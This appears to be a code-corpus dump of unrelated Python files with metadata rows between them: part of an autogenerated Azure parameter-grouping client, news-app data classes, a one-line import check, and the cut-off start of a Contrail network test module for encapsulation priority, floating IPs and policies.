:param parameter_grouping_post_required_parameters: Additional
parameters for the operation
:type parameter_grouping_post_required_parameters:
:class:`ParameterGroupingPostRequiredParameters
<fixtures.acceptancetestsazureparametergrouping.models.ParameterGroupingPostRequiredParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises:
:class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
"""
body = None
if parameter_grouping_post_required_parameters is not None:
body = parameter_grouping_post_required_parameters.body
custom_header = None
if parameter_grouping_post_required_parameters is not None:
custom_header = parameter_grouping_post_required_parameters.custom_header
query = None
if parameter_grouping_post_required_parameters is not None:
query = parameter_grouping_post_required_parameters.query
path = None
if parameter_grouping_post_required_parameters is not None:
path = parameter_grouping_post_required_parameters.path
# Construct URL
url = '/parameterGrouping/postRequired/{path}'
path_format_arguments = {
'path': self._serialize.url("path", path, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if query is not None:
query_parameters['query'] = self._serialize.query("query", query, 'int')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
if custom_header is not None:
header_parameters['customHeader'] = self._serialize.header("custom_header", custom_header, 'str')
# Construct body
body_content = self._serialize.body(body, 'int')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post_optional(
self, parameter_grouping_post_optional_parameters=None, custom_headers=None, raw=False, **operation_config):
"""Post a bunch of optional parameters grouped.
:param parameter_grouping_post_optional_parameters: Additional
parameters for the operation
:type parameter_grouping_post_optional_parameters:
:class:`ParameterGroupingPostOptionalParameters
<fixtures.acceptancetestsazureparametergrouping.models.ParameterGroupingPostOptionalParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises:
:class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
"""
custom_header = None
if parameter_grouping_post_optional_parameters is not None:
custom_header = parameter_grouping_post_optional_parameters.custom_header
query = None
if parameter_grouping_post_optional_parameters is not None:
query = parameter_grouping_post_optional_parameters.query
# Construct URL
url = '/parameterGrouping/postOptional'
# Construct parameters
query_parameters = {}
if query is not None:
query_parameters['query'] = self._serialize.query("query", query, 'int')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
if custom_header is not None:
header_parameters['customHeader'] = self._serialize.header("custom_header", custom_header, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post_multi_param_groups(
self, first_parameter_group=None, parameter_grouping_post_multi_param_groups_second_param_group=None, custom_headers=None, raw=False, **operation_config):
"""Post parameters from multiple different parameter groups.
:param first_parameter_group: Additional parameters for the operation
:type first_parameter_group: :class:`FirstParameterGroup
<fixtures.acceptancetestsazureparametergrouping.models.FirstParameterGroup>`
:param parameter_grouping_post_multi_param_groups_second_param_group:
Additional parameters for the operation
:type parameter_grouping_post_multi_param_groups_second_param_group:
:class:`ParameterGroupingPostMultiParamGroupsSecondParamGroup
<fixtures.acceptancetestsazureparametergrouping.models.ParameterGroupingPostMultiParamGroupsSecondParamGroup>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises:
:class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
"""
header_one = None
if first_parameter_group is not None:
header_one = first_parameter_group.header_one
query_one = None
if first_parameter_group is not None:
query_one = first_parameter_group.query_one
header_two = None
if parameter_grouping_post_multi_param_groups_second_param_group is not None:
header_two = parameter_grouping_post_multi_param_groups_second_param_group.header_two
query_two = None
if parameter_grouping_post_multi_param_groups_second_param_group is not None:
query_two = parameter_grouping_post_multi_param_groups_second_param_group.query_two
# Construct URL
url = '/parameterGrouping/postMultipleParameterGroups'
# Construct parameters
query_parameters = {}
if query_one is not None:
query_parameters['query-one'] = self._serialize.query("query_one", query_one, 'int')
if query_two is not None:
query_parameters['query-two'] = self._serialize.query("query_two", query_two, 'int')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
if header_one is not None:
header_parameters['header-one'] = self._serialize.header("header_one", header_one, 'str')
if header_two is not None:
header_parameters['header-two'] = self._serialize.header("header_two", header_two, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post_shared_parameter_group_object(
self, first_parameter_group=None, custom_headers=None, raw=False, **operation_config):
"""Post parameters with a shared parameter group object.
:param first_parameter_group: Additional parameters for the operation
:type first_parameter_group: :class:`FirstParameterGroup
<fixtures.acceptancetestsazureparametergrouping.models.FirstParameterGroup>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises:
:class:`ErrorException<fixtures.acceptancetestsazureparametergrouping.models.ErrorException>`
"""
header_one = None
if first_parameter_group is not None:
header_one = first_parameter_group.header_one
query_one = None
if first_parameter_group is not None:
query_one = first_parameter_group.query_one
# Construct URL
url = '/parameterGrouping/sharedParameterGroupObject'
# Construct parameters
query_parameters = {}
if query_one is not None:
query_parameters['query-one'] = self._serialize.query("query_one", query_one, 'int')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
if header_one is not None:
header_parameters['header-one'] = self._serialize.header("header_one", header_one, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
| 46.67354 | 166 | 0.692902 | 1,432 | 13,582 | 6.313547 | 0.107542 | 0.051322 | 0.025882 | 0.031855 | 0.804557 | 0.774804 | 0.753456 | 0.750802 | 0.74505 | 0.709988 | 0 | 0.001987 | 0.221985 | 13,582 | 290 | 167 | 46.834483 | 0.853601 | 0.321528 | 0 | 0.70068 | 0 | 0 | 0.096078 | 0.041309 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034014 | false | 0 | 0.020408 | 0 | 0.088435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4ab27ba79e65f4fc49a81c5622a998a24f950007 | 2,194 | py | Python | app/models.py | lwairore/flask-news-highlight | 9b637ddf1cf90e95be4411c716f1b5fa22adb5bb | [
"MIT"
] | 1 | 2020-08-10T08:33:01.000Z | 2020-08-10T08:33:01.000Z | app/models.py | lwairore/flask-news-highlight | 9b637ddf1cf90e95be4411c716f1b5fa22adb5bb | [
"MIT"
] | null | null | null | app/models.py | lwairore/flask-news-highlight | 9b637ddf1cf90e95be4411c716f1b5fa22adb5bb | [
"MIT"
] | 1 | 2022-02-03T11:19:20.000Z | 2022-02-03T11:19:20.000Z | class Business:
"""
This class helps to design Business data to have:
1. author
2. title
3. url
4. urlToImage
5. description
6. publishedAt
"""
def __init__(self,author, title, description, url, urlToImage, publishedAt):
"""
This method allows us to instantiate an instance.
"""
self.author = author
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
class Everything:
"""
This class helps to design Everything data to have:
1. author
2. title
3. url
4. urlToImage
5. description
6. publishedAt
"""
def __init__(self,author, title, description, url, urlToImage, publishedAt):
"""
This method allows us to instantiate an instance.
"""
self.author = author
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
class Headlines:
"""
This class helps to design Headlines data to have:
1. author
2. title
3. url
4. urlToImage
5. description
6. publishedAt
"""
def __init__(self,author, title, description, url, urlToImage, publishedAt):
"""
This method allows us to instantiate an instance.
"""
self.author = author
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
class Sources:
"""
This class helps to design all its instance to have:
1. id
2. name
3. url
4. country
5. description
"""
def __init__(self, id, name, url, country, description):
"""
This method allows us to instantiate an instance.
"""
self.id = id
self.name = name
self.url = url
self.country = country
self.description = description
| 24.10989 | 80 | 0.55515 | 227 | 2,194 | 5.295154 | 0.162996 | 0.049917 | 0.046589 | 0.053245 | 0.81198 | 0.738769 | 0.738769 | 0.738769 | 0.738769 | 0.701331 | 0 | 0.016643 | 0.3701 | 2,194 | 91 | 81 | 24.10989 | 0.853111 | 0.343665 | 0 | 0.741935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
43694681908b13e714ae6a1b1004d71a737b85c9 | 136 | py | Python | vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/import_check.py | lougxing/gbox | f28402d97cacd22b5e564003af72c4022908cb4d | [
"MIT"
] | null | null | null | vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/import_check.py | lougxing/gbox | f28402d97cacd22b5e564003af72c4022908cb4d | [
"MIT"
] | 13 | 2020-01-28T22:30:33.000Z | 2022-03-02T14:57:16.000Z | vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/import_check.py | lougxing/gbox | f28402d97cacd22b5e564003af72c4022908cb4d | [
"MIT"
] | null | null | null | # Make sure we can import the print_function (and therefore that we're
# running a recent python)
from __future__ import print_function
| 34 | 70 | 0.808824 | 22 | 136 | 4.727273 | 0.818182 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154412 | 136 | 3 | 71 | 45.333333 | 0.904348 | 0.683824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
436a53766d0630b0388f29146a10ecd1e1d383a0 | 38,729 | py | Python | serial_scripts/encap/test_encap.py | hkgopal/tf-test | dfb00ce26fb159ab5a91726f9647b68d905cfbad | [
"Apache-2.0"
] | 5 | 2020-09-29T00:36:57.000Z | 2022-02-16T06:51:32.000Z | serial_scripts/encap/test_encap.py | hkgopal/tf-test | dfb00ce26fb159ab5a91726f9647b68d905cfbad | [
"Apache-2.0"
] | 27 | 2019-11-02T02:18:34.000Z | 2022-02-24T18:49:08.000Z | serial_scripts/encap/test_encap.py | hkgopal/tf-test | dfb00ce26fb159ab5a91726f9647b68d905cfbad | [
"Apache-2.0"
] | 20 | 2019-11-28T16:02:25.000Z | 2022-01-06T05:56:58.000Z | # Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run tests, you can do 'python -m testtools.run mx_tests'. To run specific tests,
# You can do 'python -m testtools.run -l mx_test'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will try to pick params.ini in PWD
# Set the env variable MX_GW_TESTto 1 to run the test
#
from encap import base
from builtins import str
import os
from time import sleep
import socket
import xml.etree.ElementTree as ET
from tcutils.wrappers import preposttest_wrapper
from tcutils.commands import ssh, execute_cmd, execute_cmd_out
from fabric.operations import get, put
from tcutils.wrappers import preposttest_wrapper
from vn_test import *
from vm_test import *
from floating_ip import *
from control_node import *
from policy_test import *
import test
from tcutils.tcpdump_utils import check_pcap_file_exists
class TestEncapCases(base.BaseEncapTest):
@classmethod
def setUpClass(cls):
super(TestEncapCases, cls).setUpClass()
def runTest(self):
pass
# end runTest
@test.attr(type='serial')
@preposttest_wrapper
def test_encaps_mx_gateway(self):
'''Test to validate floating-ip froma a public pool assignment to a VM. It creates a VM, assigns a FIP to it and pings to outside the cluster.'''
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
if len(self.connections.nova_h.get_hosts()) < 2:
raise self.skipTest(
'Skipping Test. At least 2 compute node required to run the test')
self.logger.info("Read the existing encap priority")
existing_encap = self.connections.read_vrouter_config_encap()
self.logger.info('Setting new Encap before continuing')
config_id = self.connections.update_vrouter_config_encap(
'MPLSoUDP', 'MPLSoGRE', 'VXLAN')
self.logger.info('Created.UUID is %s' % (config_id))
configured_encap_list = [
str('MPLSoUDP'), str('MPLSoGRE'), str('VXLAN')]
if existing_encap != configured_encap_list :
self.addCleanup(self.connections.update_vrouter_config_encap, existing_encap[0], existing_encap[1], existing_encap[2])
encap_list = self.connections.read_vrouter_config_encap()
if configured_encap_list != encap_list:
self.logger.error(
"Configured Encap Priority order is NOT matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
assert False
else:
self.logger.info(
"Configured Encap Priority order is matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
result = True
fip_pool_name = self.inputs.fip_pool_name
fvn_name = 'public100'
fip_subnets = [self.inputs.fip_pool]
vm1_name = 'vm200'
vn1_name = 'vn200'
vn1_subnets = ['11.1.1.0/24']
api_server_port = self.inputs.api_server_port
api_server_ip = self.inputs.cfgm_ip
mx_rt = self.inputs.mx_rt
router_name = self.inputs.ext_routers[0][0]
router_ip = self.inputs.ext_routers[0][1]
self.project_fixture = self.useFixture(
ProjectFixture(
project_name=self.inputs.project_name,
connections=self.connections))
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
self.inputs.project_name)
self.project_fixture.set_sec_group_for_allow_all(
self.inputs.project_name, 'default')
fvn_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=fvn_name,
inputs=self.inputs,
subnets=fip_subnets,
router_asn=self.inputs.router_asn,
rt_number=mx_rt))
assert fvn_fixture.verify_on_setup()
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn1_name,
inputs=self.inputs,
subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn1_fixture.obj,
vm_name=vm1_name))
assert vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
routing_instance = fvn_fixture.ri_name
# Configuring all control nodes here
for entry in self.inputs.bgp_ips:
hostname = self.inputs.host_data[entry]['name']
entry_control_ip = self.inputs.host_data[
entry]['host_control_ip']
cn_fixture1 = self.useFixture(
CNFixture(
connections=self.connections,
router_name=hostname,
router_ip=entry_control_ip,
router_type='contrail',
inputs=self.inputs))
cn_fixturemx = self.useFixture(
CNFixture(
connections=self.connections,
router_name=router_name,
router_ip=router_ip,
router_type='mx',
inputs=self.inputs))
sleep(10)
assert cn_fixturemx.verify_on_setup()
vm1_fixture.wait_till_vm_is_up()
# TODO Configure MX. Doing Manually For Now
self.logger.info(
"BGP Peer configuraion done and trying to outside the VN cluster")
self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
if not self.inputs.pcap_on_vm:
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
self.inputs.public_host,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
if not self.inputs.pcap_on_vm:
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
fip_fixture.disassoc_and_delete_fip(fip_id)
if not result:
self.logger.error(
'Test ping outside VN cluster from VM %s failed' %
(vm1_name))
assert result
else:
self.logger.info(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
raise self.skipTest(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
return True
# end test_encaps_mx_gateway
@skip_because(dpdk_cluster=True)
@test.attr(type=[ 'serial', 'sanity', 'vcenter' ])
@preposttest_wrapper
def test_apply_policy_fip_on_same_vn_gw_mx(self):
'''A particular VN is configure with policy to talk accross VN's and FIP to access outside'''
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
if len(self.connections.orch.get_hosts()) < 2:
self.logger.info(
"Skipping Test. At least 2 compute node required to run the test")
raise self.skipTest(
'Skipping Test. At least 2 compute node required to run the test')
self.logger.info("Read the existing encap priority")
existing_encap = self.connections.read_vrouter_config_encap()
self.logger.info('Setting new Encap before continuing')
config_id = self.connections.update_vrouter_config_encap(
'MPLSoUDP', 'MPLSoGRE', 'VXLAN')
self.logger.info('Created.UUID is %s' % (config_id))
configured_encap_list = [
str('MPLSoUDP'), str('MPLSoGRE'), str('VXLAN')]
if existing_encap != configured_encap_list :
self.addCleanup(self.connections.update_vrouter_config_encap, existing_encap[0], existing_encap[1], existing_encap[2])
encap_list = self.connections.read_vrouter_config_encap()
if configured_encap_list != encap_list:
self.logger.error(
"Configured Encap Priority order is NOT matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
assert False
else:
self.logger.info(
"Configured Encap Priority order is matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
result = True
fip_pool_name = self.inputs.fip_pool_name
fvn_name = 'public100'
fip_subnets = [self.inputs.fip_pool]
vm1_name = 'vm200'
vn1_name = 'vn200'
vn1_subnets = ['11.1.1.0/24']
vm2_name = 'vm300'
vn2_name = 'vn300'
vn2_subnets = ['22.1.1.0/24']
api_server_port = self.inputs.api_server_port
api_server_ip = self.inputs.cfgm_ip
mx_rt = self.inputs.mx_rt
router_name = self.inputs.ext_routers[0][0]
router_ip = self.inputs.ext_routers[0][1]
self.project_fixture = self.useFixture(
ProjectFixture(
project_name=self.inputs.project_name,
connections=self.connections))
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
self.inputs.project_name)
self.project_fixture.set_sec_group_for_allow_all(
self.inputs.project_name, 'default')
# Get all compute host
host_list = self.connections.orch.get_hosts()
fvn_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=fvn_name,
inputs=self.inputs,
subnets=fip_subnets,
router_asn=self.inputs.router_asn,
rt_number=mx_rt))
assert fvn_fixture.verify_on_setup()
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn1_name,
inputs=self.inputs,
subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn1_fixture.obj,
vm_name=vm1_name,
node_name=host_list[0]))
assert vm1_fixture.verify_on_setup()
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn2_name,
inputs=self.inputs,
subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vm2_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn2_fixture.obj,
vm_name=vm2_name,
node_name=host_list[1]))
assert vm2_fixture.verify_on_setup()
# Fip
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
routing_instance = fvn_fixture.ri_name
# Configuring all control nodes here
for entry in self.inputs.bgp_ips:
hostname = self.inputs.host_data[entry]['name']
entry_control_ip = self.inputs.host_data[
entry]['host_control_ip']
cn_fixture1 = self.useFixture(
CNFixture(
connections=self.connections,
router_name=hostname,
router_ip=entry_control_ip,
router_type='contrail',
inputs=self.inputs))
cn_fixturemx = self.useFixture(
CNFixture(
connections=self.connections,
router_name=router_name,
router_ip=router_ip,
router_type='mx',
inputs=self.inputs))
sleep(10)
assert cn_fixturemx.verify_on_setup()
# Policy
# Apply policy in between VN
policy1_name = 'policy1'
policy2_name = 'policy2'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': vn1_name,
'dest_network': vn2_name,
},
]
rev_rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': vn2_name,
'dest_network': vn1_name,
},
]
policy1_fixture = self.useFixture(
PolicyFixture(
policy_name=policy1_name,
rules_list=rules,
inputs=self.inputs,
connections=self.connections))
policy2_fixture = self.useFixture(
PolicyFixture(
policy_name=policy2_name,
rules_list=rev_rules,
inputs=self.inputs,
connections=self.connections))
self.logger.info('Apply policy between VN %s and %s' %
(vn1_name, vn2_name))
vn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], vn1_fixture.vn_id)
self.addCleanup(
vn1_fixture.unbind_policies, vn1_fixture.vn_id, [
policy1_fixture.policy_fq_name])
vn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], vn2_fixture.vn_id)
self.addCleanup(
vn2_fixture.unbind_policies, vn2_fixture.vn_id, [
policy2_fixture.policy_fq_name])
vm1_fixture.wait_till_vm_is_up()
vm2_fixture.wait_till_vm_is_up()
self.logger.info(
'Checking connectivity within VNS cluster through Policy')
self.logger.info('Ping from %s to %s' % (vm1_name, vm2_name))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
vm2_fixture.vm_ip,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
comp_vm2_ip = vm2_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'UDP')
self.tcpdump_analyze_on_compute(comp_vm2_ip, 'UDP')
self.logger.info(
'Checking connectivity outside VNS cluster through FIP')
self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
self.inputs.public_host,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
if not result:
self.logger.error(
'Test to verify the Traffic to Inside and Outside Virtual network cluster simaltaneiously failed')
assert result
else:
self.logger.info(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
raise self.skipTest(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
return True
# end test_apply_policy_fip_on_same_vn_gw_mx
@test.attr(type='serial')
@preposttest_wrapper
def test_apply_policy_fip_vn_with_encaps_change_gw_mx(self):
'''A particular VN is configured with policy to talk across VN's and FIP to access outside.The encapsulation prioritis set at the start of testcase are changed and verified '''
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
if len(self.connections.nova_h.get_hosts()) < 2:
self.logger.info(
"Skipping Test. At least 2 compute node required to run the test")
raise self.skipTest(
'Skipping Test. At least 2 compute node required to run the test')
self.logger.info("Read the existing encap priority")
existing_encap = self.connections.read_vrouter_config_encap()
self.logger.info('Setting new Encap before continuing')
config_id = self.connections.update_vrouter_config_encap(
'MPLSoUDP', 'MPLSoGRE', 'VXLAN')
self.logger.info('Created.UUID is %s' % (config_id))
configured_encap_list = [
str('MPLSoUDP'), str('MPLSoGRE'), str('VXLAN')]
if existing_encap != configured_encap_list :
self.addCleanup(self.connections.update_vrouter_config_encap, existing_encap[0], existing_encap[1], existing_encap[2])
encap_list = self.connections.read_vrouter_config_encap()
if configured_encap_list != encap_list:
self.logger.error(
"Configured Encap Priority order is NOT matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
assert False
else:
self.logger.info(
"Configured Encap Priority order is matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
result = True
fip_pool_name = self.inputs.fip_pool_name
fvn_name = 'public100'
fip_subnets = [self.inputs.fip_pool]
vm1_name = 'vm200'
vn1_name = 'vn200'
vn1_subnets = ['11.1.1.0/24']
vm2_name = 'vm300'
vn2_name = 'vn300'
vn2_subnets = ['22.1.1.0/24']
api_server_port = self.inputs.api_server_port
api_server_ip = self.inputs.cfgm_ip
mx_rt = self.inputs.mx_rt
router_name = self.inputs.ext_routers[0][0]
router_ip = self.inputs.ext_routers[0][1]
self.project_fixture = self.useFixture(
ProjectFixture(
project_name=self.inputs.project_name,
connections=self.connections))
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
self.inputs.project_name)
self.project_fixture.set_sec_group_for_allow_all(
self.inputs.project_name, 'default')
# Get all compute host
host_list = self.connections.nova_h.get_hosts()
fvn_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=fvn_name,
inputs=self.inputs,
subnets=fip_subnets,
router_asn=self.inputs.router_asn,
rt_number=mx_rt))
assert fvn_fixture.verify_on_setup()
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn1_name,
inputs=self.inputs,
subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn1_fixture.obj,
vm_name=vm1_name,
node_name=host_list[0]))
assert vm1_fixture.verify_on_setup()
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn2_name,
inputs=self.inputs,
subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vm2_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn2_fixture.obj,
vm_name=vm2_name,
node_name=host_list[1]))
assert vm2_fixture.verify_on_setup()
# Fip
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
routing_instance = fvn_fixture.ri_name
# Configuring all control nodes here
for entry in self.inputs.bgp_ips:
hostname = self.inputs.host_data[entry]['name']
entry_control_ip = self.inputs.host_data[
entry]['host_control_ip']
cn_fixture1 = self.useFixture(
CNFixture(
connections=self.connections,
router_name=hostname,
router_ip=entry_control_ip,
router_type='contrail',
inputs=self.inputs))
cn_fixturemx = self.useFixture(
CNFixture(
connections=self.connections,
router_name=router_name,
router_ip=router_ip,
router_type='mx',
inputs=self.inputs))
sleep(10)
assert cn_fixturemx.verify_on_setup()
# Policy
# Apply policy in between VN
policy1_name = 'policy1'
policy2_name = 'policy2'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': vn1_name,
'dest_network': vn2_name,
},
]
rev_rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
